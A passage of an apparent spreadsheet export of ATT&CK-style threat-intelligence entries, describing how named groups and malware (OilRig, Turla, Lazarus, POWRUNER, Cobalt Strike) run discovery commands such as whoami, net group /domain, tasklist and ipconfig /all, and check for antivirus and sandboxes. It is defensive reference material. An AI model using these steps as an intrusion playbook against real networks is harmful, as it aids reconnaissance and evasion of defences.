    <t>[[Software/S0184|POWRUNER]] may collect information about the currently logged in user by running &lt;code&gt;whoami&lt;/code&gt; on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>A Linux version of [[Software/S0021|Derusbi]] checks if the victim user ID is anything other than zero (normally used for root), and the malware will not execute if it does not have root privileges.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>An [[Group/G0022|APT3]] downloader uses the Windows command &lt;code&gt;"cmd.exe" /C whoami&lt;/code&gt; to verify that it is running with the elevated privileges of ?System.?[[CiteRef::FireEye Operation Double Tap]]</t>
  </si>
  <si>
    <t>[[Software/S0155|WINDSHIELD]] can gather the victim user name.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] provides access to the Windows Registry, which can be used to gather information.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0013|PlugX]] can query for information contained within the Windows Registry.[[CiteRef::Lastline PlugX Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used &lt;code&gt;reg query ?HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default?&lt;/code&gt; on a victim to query the Registry.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0145|POWERSOURCE]] queries Registry keys in preparation for setting Run keys to achieve persistence.[[CiteRef::Cisco DNSMessenger March 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware IndiaIndia checks Registry keys within HKCU and HKLM to determine if certain applications are present, including SecureCRT, Terminal Services, RealVNC, TightVNC, UltraVNC, Radmin, mRemote, TeamViewer, FileZilla, pcAnyware, and Remote Desktop.[[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] can gather very specific information about attached USB devices, to include device instance ID and drive geometry.[[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0075|Reg]] may be used to gather details from the Windows Registry of a local or remote system at the command-line interface.[[CiteRef::Microsoft Reg]]</t>
  </si>
  <si>
    <t>[[Software/S0031|BACKSPACE]] is capable of enumerating and making modifications to an infected system's Registry.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0155|WINDSHIELD]] can gather Registry values.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>queries the registry to look for information about Terminal Services [[CiteRef::Symantec Buckeye]].</t>
  </si>
  <si>
    <t>searches and reads the value of the Windows Update Registry Run key.[[CiteRef::ClearSky Charming Kitten Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may query the Registry by running &lt;code&gt;reg query&lt;/code&gt; on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>Software: Ping, ping.exe</t>
  </si>
  <si>
    <t>[[Software/S0097|Ping]] can be used to identify remote systems within a network.[[CiteRef::TechNet Ping]]</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net view&lt;/code&gt; can be used in [[Software/S0039|Net]] to gather information about available remote systems.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>[[Group/G0053|FIN5]] has used the open source tool Essential NetTools to map the network and build a list of targets.[[CiteRef::Mandiant FIN5 GrrCON Oct 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0037|FIN6]] used publicly available tools (including Microsoft's built-in SQL querying tool, osql.exe) to map the internal network and conduct reconnaissance against Active Directory, Structured Query Language (SQL) servers, and NetBIOS.[[CiteRef::FireEye FIN6 April 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can ping or traceroute a remote host.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] uses scripts to enumerate IP ranges on the victim network.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]] [[Group/G0045|menuPass]] has also issued the command &lt;code&gt;net view /domain&lt;/code&gt; to a [[Software/S0013|PlugX]] implant to gather information about remote systems on the network.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can detect the existence of remote systems.[[CiteRef::Symantec Buckeye]][[CiteRef::FireEye Clandestine Fox]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] uses the native Windows Network Enumeration APIs to interrogate and discover targets in a Windows Active Directory network.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>performs a connection test to discover remote systems in the network [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0063|SHOTPUT]] has a command to list all servers in the domain, as well as one to locate domain controllers on a domain.[[CiteRef::Palo Alto CVE-2015-3113 July 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0060|BRONZE BUTLER]] typically use &lt;code&gt;ping&lt;/code&gt; and [[Software/S0039|Net]] to enumerate systems.[[CiteRef::Secureworks BRONZE BUTLER Oct 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0063|SHOTPUT]] has a command to obtain a process listing.[[CiteRef::Palo Alto CVE-2015-3113 July 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has a command to list the victim's processes.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has used built-in tools like &lt;code&gt;ps aux&lt;/code&gt; on macOS to determine which processes are running [[CiteRef::XAgentOSX]].</t>
  </si>
  <si>
    <t>[[Software/S0049|GeminiDuke]] collects information on running processes and environment variables from the victim.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can list out currently running processes. [[CiteRef::FireEye Clandestine Fox]] [[CiteRef::evolution of pirpi]]</t>
  </si>
  <si>
    <t>[[Software/S0034|NETEAGLE]] can send process listings over the C2 channel.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover remote systems on a local network using the &lt;code&gt;net view&lt;/code&gt; and &lt;code&gt;net view /DOMAIN&lt;/code&gt; commands.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>[[Software/S0064|ELMER]] is capable of performing process listings.[[CiteRef::FireEye EPS Awakens Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0069|BLACKCOFFEE]] has the capability to discover processes.[[CiteRef::FireEye APT17]]</t>
  </si>
  <si>
    <t>[[Software/S0057|Tasklist]] can be used to discover processes running on a system.[[CiteRef::Microsoft Tasklist]]</t>
  </si>
  <si>
    <t>[[Group/G0051|FIN10]] has used Meterpreter to enumerate users on remote systems.[[CiteRef::FireEye FIN10 June 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] runs tests to determine the privilege level of the compromised user.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the getProcessList function to run &lt;code&gt;ps aux&lt;/code&gt; to get running processes.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>The OsInfo function in [[Software/S0162|Komplex]] collects a running process list.[[CiteRef::Sofacy Komplex Trojan]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can list running processes.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Software/S0032|gh0st]] RAT is able to list processes.[[CiteRef::FireEye Hacking Team]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] obtains a list of running processes on the victim.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] has the capability to execute the command &lt;code&gt;ipconfig /all&lt;/code&gt;.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] executes &lt;code&gt;ipconfig /all&lt;/code&gt; after initial communication is made to the remote server.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>collects MAC address and local IP address information from the victim.[[CiteRef::US-CERT FALLCHILL Nov 2017]]</t>
  </si>
  <si>
    <t>Software: ipconfig, ipconfig.exe</t>
  </si>
  <si>
    <t>[[Software/S0100|ipconfig]] can be used to display adapter configuration on Windows systems, including information for TCP/IP, DNS, and DHCP.</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware IndiaIndia obtains and sends to its C2 server information about the first network interface card?s configuration, including IP address, gateways, subnet mask, DHCP information, and whether WINS is available.[[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] can obtain information about the victim's IP address.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0060|Sys10]] collects the local IP address of the victim and sends it to the C2.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can obtain information about network parameters.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware gathers the victim's local IP address, MAC address, and external IP address.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used several tools to scan for open NetBIOS nameservers and enumerate NetBIOS sessions.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0049|GeminiDuke]] collects information on network settings and Internet proxy settings from the victim.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>A keylogging tool used by [[Group/G0022|APT3]] gathers network information from the victim, including the MAC address, IP address, WINS, DHCP server, and gateway.[[CiteRef::Symantec Buckeye]] [[CiteRef::evolution of pirpi]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has a command to get the victim's domain and NetBIOS name.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] has a command to collect the victim's IP address.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Software/S0084|Mis-Type]] may create a file containing the results of the command &lt;code&gt;cmd.exe /c ipconfig /all&lt;/code&gt;.[[CiteRef::Cylance Dust Storm]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] performs local network configuration discovery using &lt;code&gt;ipconfig /all&lt;/code&gt;.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may collect network configuration data by running &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>discovers the current domain information [[CiteRef::Symantec Buckeye]].</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has run &lt;code&gt;whoami&lt;/code&gt; on a victim.[[CiteRef::Palo Alto OilRig May 2016]][[CiteRef::Palo Alto OilRig Oct 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can obtain information about network configuration, including the routing table, ARP cache, and DNS cache.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware gathers the Address Resolution Protocol (ARP) table from the victim.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0032|Lazarus Group]] malware SierraAlfa and WhiskeyAlfa-Three enumerate logged-on users. [[Group/G0032|Lazarus Group]] malware IndiaIndia collects the victim's username and sends it to the C2 server.[[CiteRef::Novetta Blockbuster Loaders]]
[[CiteRef::Novetta Blockbuster RATs]][[CiteRef::Novetta Blockbuster Destructive Malware]]</t>
  </si>
  <si>
    <t>collects the victim LAN IP address and sends it to the C2 server.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover network configuration details using the &lt;code&gt;arp -a&lt;/code&gt;, &lt;code&gt;nbtstat -n&lt;/code&gt;, and &lt;code&gt;net config&lt;/code&gt; commands.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>A [[Group/G0047|Gamaredon Group]] file stealer can gather the victim's username to send to a C2 server.[[CiteRef::Palo Alto Gamaredon Feb 2017]]</t>
  </si>
  <si>
    <t>Software: Arp, arp.exe</t>
  </si>
  <si>
    <t>[[Software/S0099|Arp]] can be used to display ARP configuration information on the host.</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors use nbtscan to discover vulnerable systems.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>Software: nbtstat, nbtstat.exe</t>
  </si>
  <si>
    <t>[[Software/S0102|nbtstat]] can be used to discover local NetBIOS domain names.</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has gathered information about network IP configurations using [[Software/S0100|ipconfig]].exe and about routing tables using [[Software/S0103|route]].exe.[[CiteRef::F-Secure BlackEnergy 2014]][[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0059|WinMM]] uses NetUser-GetInfo to identify that it is running under an ?Admin? account on the local system.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has run &lt;code&gt;ipconfig /all&lt;/code&gt; on a victim.[[CiteRef::Palo Alto OilRig May 2016]][[CiteRef::Palo Alto OilRig Oct 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0019|Naikon]] uses commands such as &lt;code&gt;netsh interface show&lt;/code&gt; to discover network interface settings.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can obtain information about the logged on user both locally and for Remote Desktop sessions.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware has obtained the victim username and sent it to the C2 server.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0130|Unknown Logger]] can obtain information about the victim usernames.[[CiteRef::Forcepoint Monsoon]]</t>
  </si>
  <si>
    <t>[[Software/S0058|SslMM]] sends the logged-on username to its hard-coded C2.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0060|Sys10]] collects the account name of the logged-in user and sends it to the C2.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can enumerate the permissions associated with Windows groups.[[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>specifically looks for Domain Admins, Power Users, and the Administrators groups within the domain and locally [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may collect permission group information by running &lt;code&gt;net group /domain&lt;/code&gt; or a series of other commands on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] has checked for the local admin group domain admin group and Exchange Trusted Subsystem groups using the commands &lt;code&gt;net group Exchange Trusted Subsystem /domain&lt;/code&gt; and &lt;code&gt;net group domain admins /domain&lt;/code&gt;.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>Commands such as &lt;code&gt;net group&lt;/code&gt; and &lt;code&gt;net localgroup&lt;/code&gt; can be used in [[Software/S0039|Net]] to gather information about and manipulate groups.[[CiteRef::Savill 1999]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] collects the current username from the victim.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following command following exploitation of a machine with [[Software/S0042|LOWBALL]] malware to list local groups: &lt;code&gt;net localgroup administrator &gt;&gt; %temp%\download&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Software/S0060|Sys10]] collects the group name of the logged-in user and sends it to the C2.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used &lt;code&gt;net group /domain&lt;/code&gt;, &lt;code&gt;net localgroup administrators&lt;/code&gt;, &lt;code&gt;net group ?domain admins? /domain&lt;/code&gt;, and &lt;code&gt;net group ?Exchange Trusted Subsystem? /domain&lt;/code&gt; to find group permission settings on a victim.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] has the capability to execute the command &lt;code&gt;net localgroup administrators&lt;/code&gt;.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] performs discovery of permission groups &lt;code&gt;net group /domain&lt;/code&gt;.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] has the ability to scan for security tools such as firewalls and antivirus tools.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0108|netsh]] can be used to discover system firewall settings.[[CiteRef::TechNet Netsh Firewall]]</t>
  </si>
  <si>
    <t>[[Software/S0057|Tasklist]] can be used to enumerate security software currently running on a system by process name of known products.[[CiteRef::Microsoft Tasklist]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] checks for the existence of anti-virus.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Software/S0023|CHOPSTICK]] checks for anti-virus, forensics, and virtualization software.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>The main [[Software/S0046|CozyCar]] dropper checks whether the victim has an anti-virus product installed. If the installed product is on a predetermined list, the dropper will exit. Newer versions of [[Software/S0046|CozyCar]] will check to ensure it is not being executed inside a virtual machine or a known malware analysis sandbox environment. If it detects that it is, it will exit. [[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may collect information the victim's anti-virus software.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can obtain information about security software on the victim.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0040|Patchwork]] scanned the ?Program Files? directories for a directory with the string ?Total Security? (the installation path of the ?360 Total Security? antivirus tool).[[CiteRef::Cymmetria Patchwork]]</t>
  </si>
  <si>
    <t>checks for processes associated with anti-virus vendors.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] has a plugin to detect active drivers of some security products.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0019|Naikon]] uses commands such as &lt;code&gt;netsh advfirewall firewall&lt;/code&gt; to discover local firewall settings.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>checks for the presence of Bitdefender security software.[[CiteRef::Microsoft SIR Vol 21]]</t>
  </si>
  <si>
    <t>[[Software/S0151|HALFBAKED]] can obtain information about running processes on the victim.[[CiteRef::FireEye FIN7 April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0004|Ke3chang]] performs process discovery using &lt;code&gt;tasklist&lt;/code&gt; commands.[[CiteRef::Villeneuve et al 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0094|Trojan.Karagany]] can use tasklist to collect a list of running tasks.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0021|Derusbi]] collects current and parent process IDs.[[CiteRef::Fidelis Turbo]]</t>
  </si>
  <si>
    <t>[[Software/S0093|Backdoor.Oldrea]] collects information about running processes.[[CiteRef::Symantec Dragonfly]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] collects its process identifier (PID) on the victim.[[CiteRef::Palo Alto menuPass Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] collects information about running processes from victims.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] collects the victim's running process IDs.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>Several [[Group/G0032|Lazarus Group]] malware families gather a list of running processes on a victim system and send it to their C2 server.[[CiteRef::Novetta Blockbuster Loaders]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware can list running processes.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] has used [[Software/S0057|Tasklist]] to get information on processes.[[CiteRef::Unit 42 Playbook OilRig Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may collect process information by running &lt;code&gt;tasklist&lt;/code&gt; on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0031|BACKSPACE]] may collect information about running processes.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]]'s "beacon" payload can collect information on process details.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Software/S0142|StreamEx]] has the ability to enumerate processes.[[CiteRef::Cylance Shell Crew Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0009|Deep Panda]] uses the Microsoft [[Software/S0057|Tasklist]] utility to list processes running on systems.[[CiteRef::Alperovitch 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can obtain a process list from the victim.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] surveys a system upon check-in to discover running processes using the &lt;code&gt;tasklist /v&lt;/code&gt; command.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware gathers a list of running processes.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has gathered a process list by using [[Software/S0057|Tasklist]].exe.[[CiteRef::F-Secure BlackEnergy 2014]][[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0079|MobileOrder]] has a command to upload information about all running processes to its C2 server.[[CiteRef::Scarlet Mimic Jan 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0044|Winnti Group]] looked for a specific process running on infected servers.[[CiteRef::Kaspersky Winnti April 2013]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has run &lt;code&gt;tasklist&lt;/code&gt; on a victim.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0059|WinMM]] sets a WH_CBT Windows hook to collect information on process creation.[[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Group/G0021|Molerats]] actors obtained a list of active processes on the victim and sent them to C2 servers.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Software/S0065|4H RAT]] has the capability to obtain a listing of running processes (including loaded modules).[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can obtain information about process integrity levels.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>After compromising a victim, [[Group/G0033|Poseidon Group]] lists all running processes.[[CiteRef::Kaspersky Poseidon Group]]</t>
  </si>
  <si>
    <t>[[Software/S0045|ADVSTORESHELL]] can run [[Software/S0096|Systeminfo]] to gather information about the victim.[[CiteRef::ESET Sednit Part 2]][[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0044|JHUHUGIT]] obtains a build identifier as well as victim hard drive information from Windows registry key &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services\Disk\Enum&lt;/code&gt;.[[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>[[Software/S0048|PinchDuke]] gathers system configuration information.[[CiteRef::F-Secure The Dukes]]</t>
  </si>
  <si>
    <t>A system info module in [[Software/S0046|CozyCar]] gathers information on the victim host?s configuration.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Software/S0161|XAgentOSX]] contains the getInstalledAPP function to run &lt;code&gt;ls -la /Applications&lt;/code&gt; to gather what applications are installed.[[CiteRef::XAgentOSX]]</t>
  </si>
  <si>
    <t>[[Software/S0106|cmd]] can be used to find information about the operating system.[[CiteRef::TechNet Dir]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] has enumerated installed applications on macOS devices with built-in utilities such as &lt;code&gt;ls -al /Applications&lt;/code&gt;[[CiteRef::XAgentOSX]].</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] collects hostname, volume serial number and OS version data from the victim and sends the information to its C2 server.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] has commands to get information about the victim's name, build, version, serial number, and memory usage.[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>Software: KOMPROGO</t>
  </si>
  <si>
    <t>[[Software/S0156|KOMPROGO]] is capable of retrieving information about the infected system.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0155|WINDSHIELD]] can gather the victim computer name.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0184|POWRUNER]] may collect information about the system by running &lt;code&gt;hostname&lt;/code&gt; and &lt;code&gt;systeminfo&lt;/code&gt; on a victim.[[CiteRef::FireEye APT34 Dec 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] has a tool that can obtain information about the local system.[[CiteRef::Symantec Buckeye]] [[CiteRef::evolution of pirpi]]</t>
  </si>
  <si>
    <t>discovers information about the infected machine [[CiteRef::Symantec Buckeye]].</t>
  </si>
  <si>
    <t>[[Software/S0157|SOUNDBITE]] is capable of gathering system information.[[CiteRef::FireEye APT32 May 2017]]</t>
  </si>
  <si>
    <t>During its initial execution, [[Software/S0031|BACKSPACE]] extracts operating system information from the infected host.[[CiteRef::FireEye APT30]]</t>
  </si>
  <si>
    <t>[[Group/G0045|menuPass]] has used tcping.exe, similar to [[Software/S0097|Ping]], to probe port status on systems of interest.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0061|HDoor]] scans to identify open ports on the victim. [[CiteRef::Baumgartner Naikon 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0154|Cobalt Strike]] can perform port scans from an infected host.[[CiteRef::cobaltstrike manual]]</t>
  </si>
  <si>
    <t>[[Group/G0039|Suckfly]] the victim's internal network for hosts with ports 8080, 5900, and 40 open.[[CiteRef::Symantec Suckfly May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] actors use the Hunter tool to conduct network service discovery for vulnerable systems.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Software/S0089|BlackEnergy]] has conducted port scans on a host.[[CiteRef::Securelist BlackEnergy Nov 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] has a plugin that can perform ARP scanning as well as port scanning.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Group/G0057|APT34]] has used the publicly available tool SoftPerfect Network Scanner as well as a custom tool called GOLDIRONY to conduct network scanning.[[CiteRef::FireEye APT34 Webinar Dec 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0043|BUBBLEWRAP]] collects system information, including the operating system version and hostname.[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] has a command to collect victim system information, including the system name and OS version.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Group/G0018|admin@338]] actors used the following commands after exploiting a machine with [[Software/S0042|LOWBALL]] malware to obtain information about the OS: &lt;code&gt;ver &gt;&gt; %temp%\download&lt;/code&gt; &lt;code&gt;systeminfo &gt;&gt; %temp%\download&lt;/code&gt;[[CiteRef::FireEye admin@338]]</t>
  </si>
  <si>
    <t>[[Software/S0117|XTunnel]] is capable of probing the network for open ports.[[CiteRef::Invincea XTunnel]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware attempts to determine the installed version of .NET by querying the Registry.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0125|Remsec]] can obtain the OS version information, computer name, processor architecture, machine role, and OS edition.[[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] collects the victim computer name.[[CiteRef::FireEye APT10 April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] collects the victim hostname, window resolution, and Microsoft Windows version.[[CiteRef::Palo Alto menuPass Feb 2017]][[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0062|DustySky]] extracts basic information about the operating system.[[CiteRef::DustySky]]</t>
  </si>
  <si>
    <t>[[Software/S0153|RedLeaves]] can obtain the hostname, OS version number, platform, memory information, time elapsed since system startup, and CPU information.[[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0081|Elise]] executes &lt;code&gt;systeminfo&lt;/code&gt; after initial communication is made to the remote server.[[CiteRef::Lotus Blossom Jun 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0082|Emissary]] has the capability to execute ver, systeminfo, and gpresult commands.[[CiteRef::Emissary Trojan Feb 2016]]</t>
  </si>
  <si>
